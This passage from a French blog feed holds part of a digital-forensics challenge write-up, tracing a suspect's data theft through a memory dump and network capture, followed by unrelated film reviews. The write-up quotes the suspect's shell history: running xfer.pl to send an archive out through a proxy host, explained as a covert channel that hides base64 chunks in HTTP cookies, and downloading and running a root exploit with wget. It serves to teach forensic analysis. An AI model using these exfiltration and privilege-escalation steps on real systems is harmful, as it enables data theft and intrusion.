We are close, but please notice the changes I made. Let's move this along. A swift resolution would be appreciated.

Date: Sat, 8 Dec 2007 21:53:26
Subject: Negotiate (Google Docs)
From: Steve.Vogon@gmail.com
To: faatali@hotmail.com

I've shared a document with you called &lt;q&gt;Negotiate&lt;/q&gt;
http://spreadsheets.google.com/ccc?key=XXXXX&amp;amp;inv=faatali@hotmail.com...
It's not an attachment -- it's stored online at Google Docs. To open this document, just click the link above.
Please answer on the prices and items listed.&lt;/pre&gt;
On apprend par ce mail que notre suspect négocie le prix de différentes informations et ce par le biais d'un tableur partagé sur &lt;em&gt;Google Spreadsheets&lt;/em&gt;. Il est aussi question d'un logiciel et d'instructions pour un transfert.&lt;br /&gt;
&lt;br /&gt;
Plus tard, &lt;em&gt;Steve&lt;/em&gt; renverra un message à &lt;em&gt;Faa Tali&lt;/em&gt; qui est le suivant :&lt;br /&gt;
&lt;pre&gt;On Sun Dec 16 2007_10:24 PM
To: faa tali
Subject: Delivery information

Hi, I will be delivering the items as we discussed. I plan to use your 219. location for the items.
Please check for them within the next few hours and then arrange for a reciprocal transfer.
There is one item I will keep in reserve subject to your follow-through. It's noted on the spreadsheet.&lt;/pre&gt;
On apprend que l'employé par envoyer les éléments sur le &lt;q&gt;219&lt;/q&gt;. La nature des données est listée dans le tableau que &lt;em&gt;Steve a mis en ligne&lt;/em&gt;. C'est une information importante qu'il va nous faloir récupérer ;-) &lt;br /&gt;
&lt;br /&gt;
Dans un sujet pas si éloigné que ça, &lt;em&gt;Steve Vogon&lt;/em&gt; a aussi effectué une recherche &lt;em&gt;Google&lt;/em&gt; sur les termes &lt;q&gt;private banking&lt;/q&gt; qui l'ont amené sur le site &lt;em&gt;http://www.noblebank.pl/&lt;/em&gt;.&lt;br /&gt;
D'après les même données formatées en &lt;em&gt;JSON&lt;/em&gt;, on sait qu'il a demandé des renseignements auprès de cette banque :&lt;br /&gt;
&lt;pre&gt;To: investors@noblebank.pl
Subject: Minimum account  opening balance

Hello,
Can you please tell me what the minimum balance requirement is for opening an overseas account at your bank?
Thank you,
Steve K. Vogon&lt;/pre&gt;
Il pense sans doute faire transiter l'argent de madame &lt;q&gt;faatalis&lt;/q&gt; par cette banque.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Analyse du flux réseau&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Je serais assez bref sur cette partie du challenge. Le fichier pcap fournit ne contient que des communications HTTP et des requêtes/réponses DNS mis à part une poignée de pings (ICMP ECHO). Le traffic HTTP n'est ni plus ni moins celui que l'on retrouve dans le cache du navigateur.&lt;br /&gt;
J'ai vite parsé le fichier pcap dans &lt;a href=&quot;http://www.brendangregg.com/chaosreader.html&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Chaosreader&lt;/a&gt; que je ne pense pas abandonner de si tôt :p &lt;br /&gt;
C'est vraiment très pratique et j'ai passé énormément de temps à étudier les logs par l'interface qu'il a généré et je me suis souvent référé à son résultat pour vérifier tel ou tel élément :) &lt;br /&gt;
&lt;br /&gt;
Un des points que j'ai toutefois relevé avec &lt;em&gt;Chaosreader&lt;/em&gt; et pas avec le cache du navigateur est que l'utilisateur du système s'est rendu sur &lt;a href=&quot;http://ekiga.net/ip/&quot; target=&quot;_blank&quot;&gt;ekiga.net/ip/&lt;/a&gt; et que le site a retourné que l'adresse ip du suspect depuis l'Internet était 24.3.109.26 (en local son ip est 192.168.151.130).&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://xs329.xs.to/xs329/08286/mickey974.jpg&quot; alt=&quot;Mickey Mouse&quot; style=&quot;float: right; margin-left: 5px;&quot; /&gt;Ce que en revanche je ne m'explique pas, c'est le temps qu'aura passé l'utilisateur sur le site de &lt;em&gt;Disney&lt;/em&gt;... peut-être souhaite-t-il se reconvertir en &lt;em&gt;Mickey Mouse&lt;/em&gt; ?&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;L'analyse de la mémoire&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Le &lt;q&gt;dump&lt;/q&gt; de la mémoire physique fait 284Mo. Son analyse a été très intéressante même si j'aurais passé énormément de temps pour rien les yeux collés devant des outputs de hexdump :p &lt;br /&gt;
La recherche s'est faite à grands coups de &lt;a href=&quot;http://fr.wikipedia.org/wiki/Grep&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;grep&lt;/a&gt; avec les options -b (afficher les offsets correspondants), -a (traiter le fichier comme si c'était un fichier texte) et parfois -i (&lt;a href=&quot;http://fr.wikipedia.org/wiki/Sensibilité_à_la_casse&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;insensible à la casse&lt;/a&gt;).&lt;br /&gt;
&lt;br /&gt;
Les termes recherchés ont été déterminés à partir des éléments obtenus précédemment.&lt;br /&gt;
Par exemple en sachant que le nom d'user du suspect est &lt;q&gt;stevev&lt;/q&gt; et le nom d'hôte du système est &lt;q&gt;goldfinger&lt;/q&gt;, une recherche sur &lt;q&gt;stevev@goldfinger&lt;/q&gt; a permis d'extraire des commandes tappées sous bash :&lt;br /&gt;

&lt;pre&gt;[stevev@goldfinger ~]$ export http_proxy=&lt;q&gt;http://&lt;strong&gt;219&lt;/strong&gt;.93.175.67:80&lt;/q&gt;
[stevev@goldfinger ~]$ cp /mnt/hgfs/software/xfer.pl .
[stevev@goldfinger ~]$ ./xfer.pl archive.zip
Preparing archive.zip for transmission ......
Sending now. Patience please
Data transmission complete.
Exiting
[stevev@goldfinger ~]$ rm archive.zip
[stevev@goldfinger ~]$ unset http_proxy
[stevev@goldfinger ~]$ rm xfer.pl
[stevev@goldfinger ~]$ rm archive.zip
[stevev@goldfinger ~]$ netstat -tupan&lt;/pre&gt;
Cette suite de commandes met en évidence l'utilisation d'un script perl qui a permis de transférer une archive zip vers une machine, et ce après avoir défini un proxy dont l'ip commence par... 219 (quel hazard !! ;-) )&lt;br /&gt;
&lt;br /&gt;
Une recherche sur &lt;q&gt;#!/usr/bin/perl&lt;/q&gt; nous permettra de retrouver les quelques scripts perls présent dans la mémoire du système. Après visualisation par hexdump et avoir affiné les offsets (&lt;em&gt;hexdump -C -s 258019329 -n 3208 challenge.mem&lt;/em&gt;) on peut extraite le script avec &lt;a href=&quot;http://en.wikipedia.org/wiki/Dd_(Unix)&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;dd&lt;/a&gt; (&lt;em&gt;dd if=challenge.mem skip=258019329 bs=1 count=3208 of=xfer.pl&lt;/em&gt;)&lt;br /&gt;
Le fichier obtenu est visible ici : &lt;a href=&quot;http://pastebin.ca/1070411&quot; target=&quot;_blank&quot;&gt;xfer.pl sur pastebin.ca&lt;/a&gt;. La coloration syntaxique est un peu cassé à la fin à la cause des backquotes mais on arrive à lire la grande majorité :) &lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Le script xfer.pl&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Le script en question est pas mal pensé. Il utilise une technique de &lt;a href=&quot;http://en.wikipedia.org/wiki/Covert_channel&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;covert channel&lt;/a&gt; (voyez ça comme de la &lt;a href=&quot;http://fr.wikipedia.org/wiki/Stéganographie&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;stéganographie&lt;/a&gt; réseau) qui fait passer un fichier en petits morceaux à travers la section &lt;q&gt;Cookie&lt;/q&gt; des requêtes HTTP.&lt;br /&gt;
Techniquement le fichier est d'abord encodé en base64 puis coupé en morceaux de 1236 octets. Le script a une liste d'urls prédéfinies et il envoie une simple requête HTTP GET vers les sites en insérant le morceaux de fichier encodé.&lt;br /&gt;
On voit dans le code que le script a recours à la commande wget pour envoyer les données. Seulement le problème avec wget c'est qu'il est trop bien conçu. Ainsi s'il tombe sur une redirection il va renvoyer la requête jusqu'à ce qu'il parvienne à la bonne url.&lt;br /&gt;
Pour éviter les doublons, le script rajoute un indicateur dans les requêtes HTTP permettant au récepteur de déterminer si le morceau qu'il recoit est bien la suite et non une copie du précédent.&lt;br /&gt;
&lt;br /&gt;
Pour extraire l'archive zip de ce flux caché, j'ai d'abord recréé un fichier pcap en créant un filtre sur les paquets à destination de &lt;em&gt;219.93.175.67:80&lt;/em&gt; (le récepteur qui tient en plus le rôle de proxy).&lt;br /&gt;
J'ai ensuite utilisé &lt;a href=&quot;http://www.circlemud.org/~jelson/software/tcpflow/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;tcpflow&lt;/a&gt; pour extraire les requêtes HTTP brutes avec la commande suivante :&lt;br /&gt;
&lt;pre&gt;tcpflow -r agadou.pcap  -c &amp;gt; reqs.txt&lt;/pre&gt;
J'ai retiré les doublons dans le fichier texte obtenu puis écrit un code assez maladroit (d'où l'étape préliminaire) pour recréer l'archive zip :&lt;br /&gt;

&lt;pre&gt;#!/usr/bin/env python
import base64

f=open(&amp;quot;reqs.txt&amp;quot;)
zip=&amp;quot;&amp;quot;
while True:
  line=f.readline()
  if line==&amp;quot;&amp;quot;: break
  if line.startswith(&amp;quot;Cookie: &amp;quot;):
    if line.find(&amp;quot;CVal=&amp;quot;)&amp;gt;=0:
      zip+=line.split(&amp;quot;CVal=&amp;quot;)[1].strip()
    if line.find(&amp;quot;Sessid=&amp;quot;)&amp;gt;=0:
      zip+=line.split(&amp;quot;Sessid=&amp;quot;)[1].strip()
    if line.find(&amp;quot;RMID=&amp;quot;)&amp;gt;=0:
      zip+=line.split(&amp;quot;RMID=&amp;quot;)[1].strip()
zip=zip.replace(&amp;quot;\n&amp;quot;,&amp;quot;&amp;quot;)
print zip
zip=base64.b64decode(zip)
fo=open(&amp;quot;archive.zip&amp;quot;,&amp;quot;w&amp;quot;)
fo.write(zip)
fo.close()
f.close()&lt;/pre&gt;
&lt;br /&gt;
&lt;strong&gt;Archive.zip&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Si on regarde à l'intérieur, on voit que l'archive contient les fichiers suivants :&lt;br /&gt;
&lt;pre&gt;Archive:  archive.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
   141824  12-08-07 14:19   mnt/hgfs/Admin_share/acct_prem.xls
   100864  12-08-07 14:09   mnt/hgfs/Admin_share/domain.xls
     2395  08-05-00 16:54   mnt/hgfs/Admin_share/ftp.pcap
 --------                   -------
   245083                   3 files&lt;/pre&gt;
Seulement.. l'archive est protégée par mot de passe. Ma première idée a été de continuer à fouiller dans la mémoire pour essayer de trouver le mot de passe.&lt;br /&gt;
L'utilisateur a créé l'archive en ligne de commande :&lt;br /&gt;
&lt;pre&gt;zip archive.zip /mnt/hgfs/Admin_share/acct_prem.xls /mnt/hgfs/Admin_share/domain.xls /mnt/hgfs/Admin_share/ftp.pcap&lt;/pre&gt;
puis il a protégé par mot de passe en utilisant la commande &lt;em&gt;zipcloak&lt;/em&gt;&lt;br /&gt;
&lt;pre&gt;zipcloak archive.zip&lt;/pre&gt;
J'ai donc fouillé dans la mémoire en cherchant l'image de ces processus mais je n'ai vu aucun mot de passe autour des commandes zip ou zipcloak :( &lt;br /&gt;
&lt;br /&gt;
Comme on n'est jamais mieux servi que par soit même (en tout cas dans mon cas sous Linux), j'ai tenté de casser le mot de passe en utilisant &lt;a href=&quot;http://devloop.lyua.org/releases/lzcrack-1.0.tar.gz&quot;&gt;lzcrack&lt;/a&gt;, un casseur de pass d'archives zip que j'ai développé il y a un certain temps, mais je n'ai obtenu aucun résultat.&lt;br /&gt;
&lt;br /&gt;
J'ai aussi tenté de trouver les fichiers en clair (avant compression) dans l'image de la mémoire mais aucun document xls ni aucun traffic TCP ni étaient présents.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Got r00t ?&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Toujours à coups de grep j'ai pu découvrir une autre suite de commandes lancées par bash :&lt;br /&gt;
&lt;pre&gt;uname -a
who
ll -h
mkdir temp
ll -h
chmod o-xrw temp/
ll -h
cd temp/
cp /mnt/hgfs/Admin_share/*.xls .
cp /mnt/hgfs/Admin_share/*.pcap .
exit
uname -a
id
exit
X -v
X -V
X -version
cd temp
wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
tar -zpxvf xmodulepath.tgz
cd xmodulepath
ll
unset HISTORY
./root.sh
exit
pwd
cd ..
cp /mnt/hgfs/Admin_share/intranet.vsd .
ll
ls -lh
exit&lt;/pre&gt;
On y voit notre pirate (on peut maintenant le dire :p ) créer un répertoire &lt;q&gt;temp&lt;/q&gt; (qu'il supprimera par la suite) et y recopier différents fichiers.&lt;br /&gt;
Il obtient ensuite la version de Xorg sur le système, télécharge &lt;a href=&quot;http://www.securiteam.com/exploits/5HP0L0KI0Q.html&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;un exploit pour une faille de sécurité existante&lt;/a&gt;, l'exécute puis en profite pour récupérer un dernier fichier.&lt;br /&gt;
Comme on ne dispose pas des résultats des commandes il est difficile de dire si l'utilisateur a effectivement réussi à passer root mais le fait qu'il copie ensuite un fichier qui se trouvait dans le même dossier laisse supposer que des permissions l'avaient empéché de le faire plus tôt...&lt;br /&gt;
&lt;br /&gt;
La suite de l'analyse de la mémoire a permis d'extraire des lignes de logs générées par syslogd, de voir qu'un serveur sendmail tournait, que &lt;em&gt;steve&lt;/em&gt; a un uid de 501, que le système est une distribution &lt;em&gt;CentOS&lt;/em&gt; avec un kernel 2.6.18 et qu'on trouve tout un tas de chose en mémoire.&lt;br /&gt;
Un peu de carving avec &lt;em&gt;PhotoRec&lt;/em&gt; a révélé la présence de beaucoup d'images de la navigation web en mémoire, certaines partielles, d'autres complètes :) &lt;br /&gt;
J'ai aussi testé &lt;a href=&quot;http://www.digitalforensicssolutions.com/Scalpel/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Scalpel&lt;/a&gt; pour l'occasion, mais je crois que je vais rester sur le précédent :) &lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Les trophés&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Toute chose ayant une fin, voici le fameux tableau partagé sur &lt;em&gt;Google&lt;/em&gt;. Les CSS n'étant pas intégrés, le rendu donne un peu brut :&lt;br /&gt;
&lt;img src=&quot;http://xs329.xs.to/xs329/08286/spreadsheet640.png&quot; alt=&quot;DFRWS 2008 Google Spreadsheets&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;a href=&quot;http://xs329.xs.to/xs329/08286/faatali664.png&quot;&gt;L'invitation de partage du tableau à destination de Faa Tali&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://xs329.xs.to/xs329/08286/google_qa341.png&quot;&gt;Steve Vogon... pas si américain que ça ?&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://xs329.xs.to/xs329/08286/travelocity645.png&quot;&gt;A destination du Costa Rica, passage par le Salvador&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://xs329.xs.to/xs329/08286/aruba696.png&quot;&gt;Il y en a qui s'en font pas... pourtant c'est pas avec ces 57 dollars qu'il va se payer ça&lt;/a&gt;</content>
</entry>
<entry xml:lang="fr">
  <title>Quelques critiques de films</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/07/02/516-quelques-critiques-de-films" />
  <issued>2008-07-02T19:46:01+00:00</issued>
  <modified>2008-07-02T19:46:01+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/07/02/516-quelques-critiques-de-films</id>
  <author><name>devloop</name></author>
  <dc:subject>Cinéma</dc:subject>
  <summary>Phénomènes
De M. Night Shyamalan (Sixième Sens, Incassable, Signes, Le Village)
avec Mark Wahlberg (La Planète des Singes) et Zooey Deschanel (H2G2).

Des phénomènes étranges se produisent...</summary>
  <content type="text/html" mode="escaped"> &lt;img src=&quot;http://www.zoom-cinema.fr/media/film/affiche/3183.jpg&quot; alt=&quot;Phénomènes&quot; style=&quot;float: left; margin-right: 5px;&quot; /&gt;&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=126871.html&quot; hreflang=&quot;fr&quot;&gt;Phénomènes&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
De &lt;em&gt;M. Night Shyamalan&lt;/em&gt; (&lt;em&gt;Sixième Sens&lt;/em&gt;, &lt;em&gt;Incassable&lt;/em&gt;, &lt;em&gt;Signes&lt;/em&gt;, &lt;em&gt;Le Village&lt;/em&gt;)&lt;br /&gt;
avec &lt;em&gt;Mark Wahlberg&lt;/em&gt; (&lt;em&gt;La Planète des Singes&lt;/em&gt;) et &lt;em&gt;Zooey Deschanel&lt;/em&gt; (&lt;em&gt;H2G2&lt;/em&gt;).&lt;br /&gt;
&lt;br /&gt;
Des phénomènes étranges se produisent dans des lieux publics. Les personnes touchées ont d'abord un comportement illogique (discours sans sens), se figent comme s'ils étaient &lt;q&gt;déconnectés&lt;/q&gt; puis meurent. Les premières hypothèses sont celles d'attaques terroristes à l'aide de produits toxiques...&lt;br /&gt;
&lt;br /&gt;
Je ne dévoilerais rien de plus sur ce film qui a très bien sû garder secret son contenu sans pour autant avoir recours à des méthodes exagérées pour faire parler de lui (*caugh*caugh*&lt;em&gt;cloverfield&lt;/em&gt;*caugh*).&lt;br /&gt;
Un sacré challenge de tenir le spectateur en haleine quand on connait la nature de la menace... et pourtant le challenge est réussit. Quelques scènes bien gores, un passage pour le moins étrange avec une grand-mère folle à lier, ou une rencontre pour demander de l'aide qui se termine très mal, parviennent à entretenir la tension générale du film.&lt;br /&gt;
&lt;br /&gt;
Les acteurs jouent plutôt bien, mais on en retire rien d'exceptionnel de ce côté. Il faut dire que les personnages principaux sont une famille assez atypique dont les relations semblent aussi être un mystère :D &lt;br /&gt;
A part ça le scénario est génial, très original, et rien que pour ça, ça vaut le coup de voir le film. &lt;br /&gt;
&lt;br /&gt;
Et pour finir sur le côté &lt;q&gt;philo&lt;/q&gt; je trouve que par les yeux des personnages, le réalisateur fait se déplacer la responsabilité de la faute sur tel personne, tel groupe, tel élément tout au long du film, comme pour dire que tout le monde est une menace potentielle pour les autres et même pour lui même...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=61139.html&quot; hreflang=&quot;fr&quot;&gt;John Rambo&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
De et avec &lt;em&gt;Sylvester Stallone&lt;/em&gt; et &lt;em&gt;Julie Benz&lt;/em&gt; (la bonde de la série &lt;em&gt;Dexter&lt;/em&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;John Rambo&lt;/em&gt; est un philosophe qui s'est retiré dans le nord de la &lt;em&gt;Thaïlande&lt;/em&gt; pour vivre une existence pieuse.&lt;br /&gt;
Quand une équipe humanitaire lui demande de les amener en &lt;em&gt;Birmanie&lt;/em&gt;, il est d'abord un peu réticent, puis reprends du service, bien décidé à prêcher la bonne parole aux autochtones.&lt;br /&gt;
Ses méthodes de conviction : machette, mitrailleuse, arrachage de carotide à main nue et vidage de tripe &lt;q&gt;à chaud&lt;/q&gt; (sans anestésie).&lt;br /&gt;
Certes ça gicle dans tous les sens, c'est bourrin au possible et on peut laisser son cerveau au vestiaire... mais une fois de temps en temps ça fait du bien :) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://img370.imageshack.us/img370/3168/piac6.png&quot; alt=&quot;Pi - Darren Aronofsky&quot; style=&quot;float: right; margin-left: 5px;&quot; /&gt;&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=13351.html&quot; hreflang=&quot;fr&quot;&gt;Pi&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
De &lt;em&gt;Darren Aronofsky&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;
&lt;em&gt;Max Cohen&lt;/em&gt; est un mathématicien. Pas n'importe lequel, l'un des plus brillants de son époque. Un peu autiste sur les bords, il supporte mal l'interraction avec les gens et suit un traitement pour calmer ses crises.&lt;br /&gt;
Le sujet de ses recherches : les séquences. Selon lui tout est mathématique, régit par des équations. Tout suit une séquence. Le support qui lui sert pour ses recherches est la bourse.&lt;br /&gt;
&lt;br /&gt;
Ses recherches intéressent très fortement un cabinet financier ainsi qu'un groupe religieux juif qui étudie la &lt;a href=&quot;http://fr.wikipedia.org/wiki/Torah&quot; hreflang=&quot;fr&quot;&gt;Torah&lt;/a&gt;.&lt;br /&gt;
 Pourquoi cela les intéresse-t-ils tant ? Sur quoi les recherches de &lt;em&gt;Max&lt;/em&gt; vont-elles aboutir ?&lt;br /&gt;&lt;br /&gt;
Malgré que le film soit en noir et blanc, que les images aient un certain &lt;q&gt;grain&lt;/q&gt; (du &lt;q&gt;bruit&lt;/q&gt; comme dans les logiciels de retouche photo), et que le tout se passe sur les compos électroniques de &lt;a href=&quot;http://fr.wikipedia.org/wiki/Clint_Mansell&quot; hreflang=&quot;fr&quot;&gt;Clint Mansell&lt;/a&gt;, le film ne souffre pas trop de son look &lt;q&gt;expérimental&lt;/q&gt;.&lt;br /&gt;
Il faut dire qu'une bonne partie du film se déroule dans l'appartement de &lt;em&gt;Max&lt;/em&gt;, et le noir et blanc rajoute une certaine ambiance. &lt;em&gt;Max&lt;/em&gt; une sorte de &lt;em&gt;Docteur Frankenstein&lt;/em&gt; qui cherche son monstre mathématique. Alors qu'il se rapproche de son but, sa folie et sa paranoïa grandissent.&lt;br /&gt;
Le film gagne en dynamique et en intérêt au fûr et à mesure qu'on approche de la fin. Très intéressant, mais pas forcément accessible à tous, on verrait bien &lt;em&gt;Edward Norton&lt;/em&gt; y tenir le rôle de la vedette. Si l'intrigue vous intéresse, n'hésitez pas :) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=58126.html&quot; hreflang=&quot;fr&quot;&gt;Primer&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;em&gt;Primer&lt;/em&gt; c'est l'histoire de deux chercheurs qui bricolent dans leur garage et déposent des brevets en tout genre pour gagner des sous. Des espèces d'inventeurs assez callés et très sérieux.&lt;br /&gt;
Alors qu'ils travaillent sur une machine en relation avec la pesanteur, ils observent des phénomènes pour le moins étranges pour tous scientifiques qui se respectent.&lt;br /&gt;
Il semble que la machine qu'ils ont construit ait une incidence sur le temps...&lt;br /&gt;
&lt;br /&gt;
Le film n'est pas un film d'action, presque tout se passe par les dialogues entre les deux personnages principaux. Malgré tout on regrette l'utilisation presque systématique de plans fixes qui ne dynamise pas l'histoire. Les personnages sont très rationnels, peut être trop, ça aurait pû être intéressant de les voir paniquer un peu plus, prendre plus de risques.&lt;br /&gt;
En comparaison, si j'étais un professeur qui corrigeait une copie, je mettrais probablement &lt;q&gt;peut mieux faire&lt;/q&gt; :-| &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://www.pafpaf.org/IMG/arton30.jpg&quot; alt=&quot;Requiem For A Dream&quot; style=&quot;float: left; margin-right: 5px;&quot; /&gt;&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=26602.html&quot; hreflang=&quot;fr&quot;&gt;Requiem For A Dream&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
De &lt;em&gt;Darren Aronofsky&lt;/em&gt; (encore) avec &lt;em&gt;Jared Leto&lt;/em&gt;, &lt;em&gt;Ellen Burstyn&lt;/em&gt;, &lt;em&gt;Jennifer Connelly&lt;/em&gt;, &lt;em&gt;Marlon Wayans&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;Harry&lt;/em&gt; est accro. Il n'hésite pas à voler sa mêre pour se payer ses doses. Avec sa copine &lt;em&gt;Marion&lt;/em&gt; et son meilleur ami &lt;em&gt;Tyrone&lt;/em&gt;, ils pensent se faire de l'argent en revandant de la drogue recoupée.&lt;br /&gt;
Un film plutôt déroutant au début, on alterne les scènes autours des 3 jeunes et celles centrées sur la mère qui passe son temps devant la télévision. On se demande où le réalisateur souhaite nous amener... puis on comprends.&lt;br /&gt;
Un film très poignant sur les dépendances : drogues, antidépresseurs, sucre, télévision, amour...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=56283.html&quot; hreflang=&quot;fr&quot;&gt;Dead or Alive&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
Que peut-on espérer d'un film se basant sur un jeux vidéo où les combattantes sont des bimbos aux pixels savamment répartis ? Ma foi pas grand chose. En en effet, on n'y trouve pas du bon, par contre il y a du bonnet :D &lt;br /&gt;
Le casting aurait pû se limiter à &lt;em&gt;Holly Valance&lt;/em&gt; (chapiteau! lol) ça nous aurait suffit, mais il en fallait pour tous les goûts donc on a aussi l'asiatique, la texane etc. Le film est vraiment monté comme un jeu vidéo, avec interludes, classement, logos, le tout à grands renforts de buitages...&lt;br /&gt;
Quelques pointes d'humour, malheureusement trop peu nombreuses, remontent un peu le niveau mais c'est loin d'être assez devant le scénario navrant.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://www.lippeatt.com/personal/Office_Space-front.jpg&quot; alt=&quot;35 heures - Office Space&quot; style=&quot;float: right; margin-left: 5px;&quot; /&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=28716.html&quot; hreflang=&quot;fr&quot;&gt;&lt;strong&gt;35 heures, c'est déjà trop&lt;/strong&gt; (vo: &lt;em&gt;Office Space&lt;/em&gt;)&lt;/a&gt;&lt;br /&gt;
De &lt;em&gt;Mike Judge&lt;/em&gt; (&lt;em&gt;Idiocracy&lt;/em&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;Office Space&lt;/em&gt; suit les aventures fictives de trois employés de bureau dans une entreprise contemporaine en cours de &lt;q&gt;dégraissage&lt;/q&gt;.&lt;br /&gt;
Au début on doute... certes on sait qu'il s'agit d'un film comique... mais à quel point ? Va t'on tomber dans le ringard ? L'excés ? Est-ce vraiment drôle ?&lt;br /&gt;
Finalement le réalisateur a trouvé une bonne accroche avec son personnage principal... et justement... on accroche :) &lt;br /&gt;
Le film fait la critique de la vie au travail, en particulier des entreprises &lt;q&gt;informatisées&lt;/q&gt;, en se moquant de tout ce que l'on peut subir au bureau.&lt;br /&gt;
Très sympathique à voir, le film doit prendre toute son ampleur si on le regarde entre collègues de boulot, il y a matière à débattre et rire pendant de bonnes heures :p &lt;br /&gt;
A noter la présence de &lt;em&gt;Jennifer Aniston&lt;/em&gt;, qui joue plutôt bien dans le film :) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://assets.madame.lefigaro.fr/images/cultural_product/picture/000/000/900/fsvg2u/bonbaiser.jpg&quot; alt=&quot;Bons Baisers de Bruges&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=127122.html&quot; hreflang=&quot;fr&quot;&gt;Bons Baisers de Bruges&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
Avec &lt;em&gt;Colin Farrell&lt;/em&gt;, &lt;em&gt;Brendan Gleeson&lt;/em&gt; et &lt;em&gt;Ralph Fiennes&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
C'est l'histoire de deux tueurs à gages qui doivent se mettre &lt;q&gt;au vert&lt;/q&gt; quelques temps suite à une grosse bévue. Et où sont-ils envoyés ? Dans cette putain de &lt;em&gt;Bruges&lt;/em&gt; !!&lt;br /&gt;
&lt;br /&gt;
Tout à fait hors normes, le film tourne autour d'un humour particulier dont je ne me lasse pas. On oublie carrément les gangsters chiadés des films d'actions US, ceux-çi causent de tout et n'importe quoi et n'hésitent pas à ponctuer leurs phrases avec une savante dose de vocabulaire ordurier :) &lt;br /&gt;
Ce que l'on aime c'est surtout le décalage du personnage principal, &lt;em&gt;Ray&lt;/em&gt; un tueur à gages débutant joué par &lt;em&gt;Farrell&lt;/em&gt;, qui se comporte comme un véritable gosse qui tour à tour boude, trépigne et traine des pieds (c'est pas seulement une expression). Sans compter l'exploitation de bons gros clichés sur les différents habitants du globe (les ricains racontent n'importe quoi, les canadiens sont chiants) sans oublier les nains :D Le reste c'est de l'humour noir à gogo.&lt;br /&gt;
Le film se termine en changant complètement de cap mais n'en reste pas moins exceptionnel. A voir :) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=57129.html&quot; hreflang=&quot;fr&quot;&gt;Evan tout-puissant&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
Avec &lt;em&gt;Steve Carell&lt;/em&gt; et &lt;em&gt;Morgan Freeman&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;Evan&lt;/em&gt; est un politique qui se lance dans la &lt;q&gt;cour des grands&lt;/q&gt;. Un peu tendu par les changements dans sa vie, il s'ent remet à &lt;em&gt;Dieu&lt;/em&gt; à qui il demande de l'aider à &lt;q&gt;changer le monde&lt;/q&gt; (son slogan de campagne). &lt;em&gt;Dieu&lt;/em&gt; répond à sa demande, mais pas comme il l'espérait, puisqu'il va lui donner pour tâche la construction d'une arche.&lt;br /&gt;
&lt;br /&gt;
